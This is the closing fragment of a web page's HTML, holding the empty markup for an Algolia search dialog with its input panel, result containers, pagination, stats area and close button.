}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>